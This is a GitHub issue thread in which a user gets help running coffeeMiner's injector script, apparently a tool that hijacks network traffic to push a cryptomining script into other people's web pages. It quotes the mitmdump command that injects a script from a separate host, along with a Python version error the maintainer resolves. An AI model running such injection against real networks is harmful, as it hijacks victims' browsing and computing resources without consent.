### ISSUE TITLE
Help!?Error Script Injector

### ISSUE THREAD

**Issue by mirk91** [arnaucode/coffeeMiner#10]
Hello))
problem:
I run the command  `mitmdump -s 'injector.py http://192.168.0.22:8000/script.js' -T`
and have an error:

> Loading script: injector.py http://192.168.0.22:8000/script.js
> Script error: injector.py line 11: invalid syntax
> Proxy server listening at http://0.0.0.0:8080

I beg your help, sorry if I'm to blame myself
please explain in detail.

**Comment by arnaucube** [comment]
which python version are you using?

**Comment by mirk91** [comment]
> python --version
> Python 2.7.13

**Comment by arnaucube** [comment]
CoffeeMiner is implemented for Python 3

**Comment by mirk91** [comment]
Well, I thought so, I did so `alias python = python3`
и   `python --version`
> Python 3.5.3
ran and got the same error
```
Loading script: injector.py http://192.168.0.22:8000/script.js
Script error: injector.py line 11: invalid syntax
Proxy server listening at http://0.0.0.0:8080
```
Im use ubuntu 17.04

pls help me..

**Comment by arnaucube** [comment]
try installing mitmproxy for python3

**Comment by mirk91** [comment]
thank you, you helped me, you're cool)
